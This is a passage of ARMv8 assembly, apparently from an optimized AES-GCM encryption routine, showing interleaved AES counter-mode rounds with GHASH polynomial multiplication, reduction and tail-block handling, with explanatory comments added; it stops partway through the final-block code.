aesmc v2.16b, v2.16b // AES block 2 - round 5
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 1 - round 6
trn2 v17.2d, v14.2d, v15.2d // h4l | h3l
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 3 - round 6
ldr q27, [x8, #144] // load rk9
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 0 - round 6
ldr q12, [x6] // load h1l | h1h
ext v12.16b, v12.16b, v12.16b, #8
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 2 - round 6
ldr q28, [x8, #160] // load rk10
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 1 - round 7
trn1 v9.2d, v14.2d, v15.2d // h4h | h3h
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 0 - round 7
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 2 - round 7
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 3 - round 7
trn2 v16.2d, v12.2d, v13.2d // h2l | h1l
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 1 - round 8
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 2 - round 8
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 3 - round 8
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 0 - round 8
b.lt Lenc_finish_first_blocks // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 1 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 2 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 3 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 0 - round 9
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 1 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 2 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 3 - round 10
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 0 - round 10
b.eq Lenc_finish_first_blocks // branch if AES-192
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 1 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 2 - round 11
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 0 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 3 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 1 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 2 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 0 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 3 - round 12
Lenc_finish_first_blocks:
cmp x0, x5 // check if we have <= 4 blocks
eor v17.16b, v17.16b, v9.16b // h4k | h3k
aese v2.16b, v31.16b // AES block 2 - round N-1
trn1 v8.2d, v12.2d, v13.2d // h2h | h1h
aese v1.16b, v31.16b // AES block 1 - round N-1
aese v0.16b, v31.16b // AES block 0 - round N-1
aese v3.16b, v31.16b // AES block 3 - round N-1
eor v16.16b, v16.16b, v8.16b // h2k | h1k
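// NOTE (editorial annotation): the trn1/trn2/eor sequence packs the
// precomputed powers of H pairwise: v9/v8 hold the high halves, and
// v17/v16 hold (high XOR low), the values consumed by the middle
// partial product of the Karatsuba-style GHASH multiplies later on.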
b.ge Lenc_tail // handle tail
ldp x19, x20, [x0, #16] // AES block 1 - load plaintext
rev w9, w12 // CTR block 4
ldp x6, x7, [x0, #0] // AES block 0 - load plaintext
ldp x23, x24, [x0, #48] // AES block 3 - load plaintext
ldp x21, x22, [x0, #32] // AES block 2 - load plaintext
add x0, x0, #64 // AES input_ptr update
eor x19, x19, x13 // AES block 1 - round N low
eor x20, x20, x14 // AES block 1 - round N high
fmov d5, x19 // AES block 1 - mov low
eor x6, x6, x13 // AES block 0 - round N low
eor x7, x7, x14 // AES block 0 - round N high
eor x24, x24, x14 // AES block 3 - round N high
fmov d4, x6 // AES block 0 - mov low
cmp x0, x5 // check if we have <= 8 blocks
fmov v4.d[1], x7 // AES block 0 - mov high
eor x23, x23, x13 // AES block 3 - round N low
eor x21, x21, x13 // AES block 2 - round N low
fmov v5.d[1], x20 // AES block 1 - mov high
fmov d6, x21 // AES block 2 - mov low
add w12, w12, #1 // CTR block 4
orr x9, x11, x9, lsl #32 // CTR block 4
fmov d7, x23 // AES block 3 - mov low
eor x22, x22, x14 // AES block 2 - round N high
fmov v6.d[1], x22 // AES block 2 - mov high
eor v4.16b, v4.16b, v0.16b // AES block 0 - result
fmov d0, x10 // CTR block 4
fmov v0.d[1], x9 // CTR block 4
rev w9, w12 // CTR block 5
add w12, w12, #1 // CTR block 5
eor v5.16b, v5.16b, v1.16b // AES block 1 - result
fmov d1, x10 // CTR block 5
orr x9, x11, x9, lsl #32 // CTR block 5
fmov v1.d[1], x9 // CTR block 5
rev w9, w12 // CTR block 6
st1 { v4.16b}, [x2], #16 // AES block 0 - store result
fmov v7.d[1], x24 // AES block 3 - mov high
orr x9, x11, x9, lsl #32 // CTR block 6
eor v6.16b, v6.16b, v2.16b // AES block 2 - result
st1 { v5.16b}, [x2], #16 // AES block 1 - store result
add w12, w12, #1 // CTR block 6
fmov d2, x10 // CTR block 6
fmov v2.d[1], x9 // CTR block 6
st1 { v6.16b}, [x2], #16 // AES block 2 - store result
rev w9, w12 // CTR block 7
orr x9, x11, x9, lsl #32 // CTR block 7
eor v7.16b, v7.16b, v3.16b // AES block 3 - result
st1 { v7.16b}, [x2], #16 // AES block 3 - store result
b.ge Lenc_prepretail // do prepretail
Lenc_main_loop: // main loop start
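// NOTE (editorial annotation): each iteration interleaves two streams,
// the AES rounds for CTR blocks 4k+4..4k+7 (v0-v3) and the GHASH
// accumulation over the previous iteration's four ciphertext blocks
// (v4-v7), so AES and polynomial-multiply work can overlap.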
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
rev64 v4.16b, v4.16b // GHASH block 4k (only t0 is free)
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
fmov d3, x10 // CTR block 4k+3
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
fmov v3.d[1], x9 // CTR block 4k+3
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
ldp x23, x24, [x0, #48] // AES block 4k+7 - load plaintext
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
ldp x21, x22, [x0, #32] // AES block 4k+6 - load plaintext
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
eor v4.16b, v4.16b, v11.16b // PRE 1
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
eor x23, x23, x13 // AES block 4k+7 - round N low
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
mov d10, v17.d[1] // GHASH block 4k - mid
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
eor x22, x22, x14 // AES block 4k+6 - round N high
mov d8, v4.d[1] // GHASH block 4k - mid
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
rev64 v5.16b, v5.16b // GHASH block 4k+1 (t0 and t1 free)
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
rev64 v7.16b, v7.16b // GHASH block 4k+3 (t0, t1, t2 and t3 free)
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
rev64 v6.16b, v6.16b // GHASH block 4k+2 (t0, t1, and t2 free)
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
pmull v6.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
ldp x19, x20, [x0, #16] // AES block 4k+5 - load plaintext
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
mov d4, v7.d[1] // GHASH block 4k+3 - mid
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
eor v4.8b, v4.8b, v7.8b // GHASH block 4k+3 - mid
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor x19, x19, x13 // AES block 4k+5 - round N low
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
eor x21, x21, x13 // AES block 4k+6 - round N low
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
movi v8.8b, #0xc2
pmull v4.1q, v4.1d, v16.1d // GHASH block 4k+3 - mid
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
cmp x17, #12 // setup flags for AES-128/192/256 check
fmov d5, x19 // AES block 4k+5 - mov low
ldp x6, x7, [x0, #0] // AES block 4k+4 - load plaintext
b.lt Lenc_main_loop_continue // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
b.eq Lenc_main_loop_continue // branch if AES-192
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
Lenc_main_loop_continue:
shl d8, d8, #56 // mod_constant
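// NOTE (editorial annotation): the constant built here,
// 0xC200000000000000, is the bit-reflected form of the GHASH reduction
// polynomial x^128 + x^7 + x^2 + x + 1; the two pmull-by-constant
// steps that follow fold the 256-bit Karatsuba product back into a
// 128-bit remainder.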
eor v11.16b, v11.16b, v6.16b // GHASH block 4k+3 - low
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+3 - mid
add w12, w12, #1 // CTR block 4k+3
eor v4.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
add x0, x0, #64 // AES input_ptr update
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
rev w9, w12 // CTR block 4k+8
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor x6, x6, x13 // AES block 4k+4 - round N low
eor v10.16b, v10.16b, v4.16b // MODULO - karatsuba tidy up
eor x7, x7, x14 // AES block 4k+4 - round N high
fmov d4, x6 // AES block 4k+4 - mov low
orr x9, x11, x9, lsl #32 // CTR block 4k+8
eor v7.16b, v9.16b, v7.16b // MODULO - fold into mid
eor x20, x20, x14 // AES block 4k+5 - round N high
eor x24, x24, x14 // AES block 4k+7 - round N high
add w12, w12, #1 // CTR block 4k+8
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
fmov v4.d[1], x7 // AES block 4k+4 - mov high
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
fmov d7, x23 // AES block 4k+7 - mov low
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
fmov v5.d[1], x20 // AES block 4k+5 - mov high
fmov d6, x21 // AES block 4k+6 - mov low
cmp x0, x5 // LOOP CONTROL
fmov v6.d[1], x22 // AES block 4k+6 - mov high
pmull v9.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
eor v4.16b, v4.16b, v0.16b // AES block 4k+4 - result
fmov d0, x10 // CTR block 4k+8
fmov v0.d[1], x9 // CTR block 4k+8
rev w9, w12 // CTR block 4k+9
add w12, w12, #1 // CTR block 4k+9
eor v5.16b, v5.16b, v1.16b // AES block 4k+5 - result
fmov d1, x10 // CTR block 4k+9
orr x9, x11, x9, lsl #32 // CTR block 4k+9
fmov v1.d[1], x9 // CTR block 4k+9
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
rev w9, w12 // CTR block 4k+10
st1 { v4.16b}, [x2], #16 // AES block 4k+4 - store result
orr x9, x11, x9, lsl #32 // CTR block 4k+10
eor v11.16b, v11.16b, v9.16b // MODULO - fold into low
fmov v7.d[1], x24 // AES block 4k+7 - mov high
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
st1 { v5.16b}, [x2], #16 // AES block 4k+5 - store result
add w12, w12, #1 // CTR block 4k+10
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
eor v6.16b, v6.16b, v2.16b // AES block 4k+6 - result
fmov d2, x10 // CTR block 4k+10
st1 { v6.16b}, [x2], #16 // AES block 4k+6 - store result
fmov v2.d[1], x9 // CTR block 4k+10
rev w9, w12 // CTR block 4k+11
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
orr x9, x11, x9, lsl #32 // CTR block 4k+11
eor v7.16b, v7.16b, v3.16b // AES block 4k+7 - result
st1 { v7.16b}, [x2], #16 // AES block 4k+7 - store result
b.lt Lenc_main_loop
Lenc_prepretail: // PREPRETAIL
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 0
rev64 v6.16b, v6.16b // GHASH block 4k+2 (t0, t1, and t2 free)
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 0
fmov d3, x10 // CTR block 4k+3
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 0
rev64 v4.16b, v4.16b // GHASH block 4k (only t0 is free)
fmov v3.d[1], x9 // CTR block 4k+3
ext v11.16b, v11.16b, v11.16b, #8 // PRE 0
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 1
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 1
eor v4.16b, v4.16b, v11.16b // PRE 1
rev64 v5.16b, v5.16b // GHASH block 4k+1 (t0 and t1 free)
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 2
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 0
mov d10, v17.d[1] // GHASH block 4k - mid
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 1
pmull v11.1q, v4.1d, v15.1d // GHASH block 4k - low
mov d8, v4.d[1] // GHASH block 4k - mid
pmull2 v9.1q, v4.2d, v15.2d // GHASH block 4k - high
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 3
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 2
eor v8.8b, v8.8b, v4.8b // GHASH block 4k - mid
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 2
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 1
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 3
pmull v10.1q, v8.1d, v10.1d // GHASH block 4k - mid
pmull2 v4.1q, v5.2d, v14.2d // GHASH block 4k+1 - high
pmull v8.1q, v5.1d, v14.1d // GHASH block 4k+1 - low
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 2
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+1 - high
mov d4, v5.d[1] // GHASH block 4k+1 - mid
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 3
eor v11.16b, v11.16b, v8.16b // GHASH block 4k+1 - low
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 3
eor v4.8b, v4.8b, v5.8b // GHASH block 4k+1 - mid
mov d8, v6.d[1] // GHASH block 4k+2 - mid
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 4
rev64 v7.16b, v7.16b // GHASH block 4k+3 (t0, t1, t2 and t3 free)
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 4
pmull v4.1q, v4.1d, v17.1d // GHASH block 4k+1 - mid
eor v8.8b, v8.8b, v6.8b // GHASH block 4k+2 - mid
add w12, w12, #1 // CTR block 4k+3
pmull v5.1q, v6.1d, v13.1d // GHASH block 4k+2 - low
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 5
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 4
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+1 - mid
pmull2 v4.1q, v6.2d, v13.2d // GHASH block 4k+2 - high
eor v11.16b, v11.16b, v5.16b // GHASH block 4k+2 - low
ins v8.d[1], v8.d[0] // GHASH block 4k+2 - mid
aese v2.16b, v23.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 5
eor v9.16b, v9.16b, v4.16b // GHASH block 4k+2 - high
mov d4, v7.d[1] // GHASH block 4k+3 - mid
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 4
pmull2 v8.1q, v8.2d, v16.2d // GHASH block 4k+2 - mid
eor v4.8b, v4.8b, v7.8b // GHASH block 4k+3 - mid
pmull2 v5.1q, v7.2d, v12.2d // GHASH block 4k+3 - high
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 5
pmull v4.1q, v4.1d, v16.1d // GHASH block 4k+3 - mid
eor v10.16b, v10.16b, v8.16b // GHASH block 4k+2 - mid
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 5
aese v1.16b, v24.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 6
aese v2.16b, v24.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 6
aese v0.16b, v24.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 6
movi v8.8b, #0xc2
aese v3.16b, v24.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 6
aese v1.16b, v25.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 7
eor v9.16b, v9.16b, v5.16b // GHASH block 4k+3 - high
aese v0.16b, v25.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 7
aese v3.16b, v25.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 7
shl d8, d8, #56 // mod_constant
aese v1.16b, v26.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 8
eor v10.16b, v10.16b, v4.16b // GHASH block 4k+3 - mid
pmull v6.1q, v7.1d, v12.1d // GHASH block 4k+3 - low
aese v3.16b, v26.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 8
cmp x17, #12 // setup flags for AES-128/192/256 check
aese v0.16b, v26.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 8
eor v11.16b, v11.16b, v6.16b // GHASH block 4k+3 - low
aese v2.16b, v25.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 7
eor v10.16b, v10.16b, v9.16b // karatsuba tidy up
aese v2.16b, v26.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 8
pmull v4.1q, v9.1d, v8.1d
ext v9.16b, v9.16b, v9.16b, #8
eor v10.16b, v10.16b, v11.16b
b.lt Lenc_finish_prepretail // branch if AES-128
aese v1.16b, v27.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 9
aese v3.16b, v27.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 9
aese v0.16b, v27.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 9
aese v2.16b, v27.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 9
aese v3.16b, v28.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 10
aese v1.16b, v28.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 10
aese v0.16b, v28.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 10
aese v2.16b, v28.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 10
b.eq Lenc_finish_prepretail // branch if AES-192
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v2.16b, v29.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
Lenc_finish_prepretail:
eor v10.16b, v10.16b, v4.16b
eor v10.16b, v10.16b, v9.16b
pmull v4.1q, v10.1d, v8.1d
ext v10.16b, v10.16b, v10.16b, #8
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
eor v11.16b, v11.16b, v4.16b
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
eor v11.16b, v11.16b, v10.16b
Lenc_tail: // TAIL
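// NOTE (editorial annotation): on entry v0-v3 already hold keystream
// for up to four more CTR blocks; the compares against 48/32/16 below
// dispatch on how many whole 16-byte blocks remain before the possibly
// partial final block.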
ext v8.16b, v11.16b, v11.16b, #8 // prepare final partial tag
sub x5, x4, x0 // x5 = bytes left to process (register previously used as main_end_input_ptr)
ldp x6, x7, [x0], #16 // AES block 4k+4 - load plaintext
eor x6, x6, x13 // AES block 4k+4 - round N low
eor x7, x7, x14 // AES block 4k+4 - round N high
cmp x5, #48
fmov d4, x6 // AES block 4k+4 - mov low
fmov v4.d[1], x7 // AES block 4k+4 - mov high
eor v5.16b, v4.16b, v0.16b // AES block 4k+4 - result
b.gt Lenc_blocks_more_than_3
cmp x5, #32
mov v3.16b, v2.16b
movi v11.8b, #0
movi v9.8b, #0
sub w12, w12, #1
mov v2.16b, v1.16b
movi v10.8b, #0
b.gt Lenc_blocks_more_than_2
mov v3.16b, v1.16b
sub w12, w12, #1
cmp x5, #16
b.gt Lenc_blocks_more_than_1
sub w12, w12, #1
b Lenc_blocks_less_than_1
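// NOTE (editorial annotation): in the short paths above the keystream
// registers are shuffled down so the final block always consumes v3,
// and w12 is decremented once per unused keystream block so the
// counter value written back at the end stays correct.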
Lenc_blocks_more_than_3: // blocks left > 3
st1 { v5.16b}, [x2], #16 // AES final-3 block - store result
ldp x6, x7, [x0], #16 // AES final-2 block - load input low & high
rev64 v4.16b, v5.16b // GHASH final-3 block
eor x6, x6, x13 // AES final-2 block - round N low
eor v4.16b, v4.16b, v8.16b // feed in partial tag
eor x7, x7, x14 // AES final-2 block - round N high
mov d22, v4.d[1] // GHASH final-3 block - mid
fmov d5, x6 // AES final-2 block - mov low
fmov v5.d[1], x7 // AES final-2 block - mov high
eor v22.8b, v22.8b, v4.8b // GHASH final-3 block - mid
movi v8.8b, #0 // suppress further partial tag feed in
mov d10, v17.d[1] // GHASH final-3 block - mid
pmull v11.1q, v4.1d, v15.1d // GHASH final-3 block - low
pmull2 v9.1q, v4.2d, v15.2d // GHASH final-3 block - high
pmull v10.1q, v22.1d, v10.1d // GHASH final-3 block - mid
eor v5.16b, v5.16b, v1.16b // AES final-2 block - result
Lenc_blocks_more_than_2: // blocks left > 2
st1 { v5.16b}, [x2], #16 // AES final-2 block - store result
ldp x6, x7, [x0], #16 // AES final-1 block - load input low & high
rev64 v4.16b, v5.16b // GHASH final-2 block
eor x6, x6, x13 // AES final-1 block - round N low
eor v4.16b, v4.16b, v8.16b // feed in partial tag
fmov d5, x6 // AES final-1 block - mov low
eor x7, x7, x14 // AES final-1 block - round N high
fmov v5.d[1], x7 // AES final-1 block - mov high
movi v8.8b, #0 // suppress further partial tag feed in
pmull2 v20.1q, v4.2d, v14.2d // GHASH final-2 block - high
mov d22, v4.d[1] // GHASH final-2 block - mid
pmull v21.1q, v4.1d, v14.1d // GHASH final-2 block - low
eor v22.8b, v22.8b, v4.8b // GHASH final-2 block - mid
eor v5.16b, v5.16b, v2.16b // AES final-1 block - result
eor v9.16b, v9.16b, v20.16b // GHASH final-2 block - high
pmull v22.1q, v22.1d, v17.1d // GHASH final-2 block - mid
eor v11.16b, v11.16b, v21.16b // GHASH final-2 block - low
eor v10.16b, v10.16b, v22.16b // GHASH final-2 block - mid
Lenc_blocks_more_than_1: // blocks left > 1
st1 { v5.16b}, [x2], #16 // AES final-1 block - store result
rev64 v4.16b, v5.16b // GHASH final-1 block
ldp x6, x7, [x0], #16 // AES final block - load input low & high
eor v4.16b, v4.16b, v8.16b // feed in partial tag
movi v8.8b, #0 // suppress further partial tag feed in
eor x6, x6, x13 // AES final block - round N low
mov d22, v4.d[1] // GHASH final-1 block - mid
pmull2 v20.1q, v4.2d, v13.2d // GHASH final-1 block - high
eor x7, x7, x14 // AES final block - round N high
eor v22.8b, v22.8b, v4.8b // GHASH final-1 block - mid
eor v9.16b, v9.16b, v20.16b // GHASH final-1 block - high
ins v22.d[1], v22.d[0] // GHASH final-1 block - mid
fmov d5, x6 // AES final block - mov low
fmov v5.d[1], x7 // AES final block - mov high
pmull2 v22.1q, v22.2d, v16.2d // GHASH final-1 block - mid
pmull v21.1q, v4.1d, v13.1d // GHASH final-1 block - low
eor v5.16b, v5.16b, v3.16b // AES final block - result
eor v10.16b, v10.16b, v22.16b // GHASH final-1 block - mid
eor v11.16b, v11.16b, v21.16b // GHASH final-1 block - low
Lenc_blocks_less_than_1: // blocks left <= 1
and x1, x1, #127 // bit_length %= 128
mvn x13, xzr // rkN_l = 0xffffffffffffffff
sub x1, x1, #128 // bit_length -= 128
neg x1, x1 // bit_length = 128 - #bits in input (in range [1,128])
ld1 { v18.16b}, [x2] // load existing bytes where the possibly partial last block is to be stored
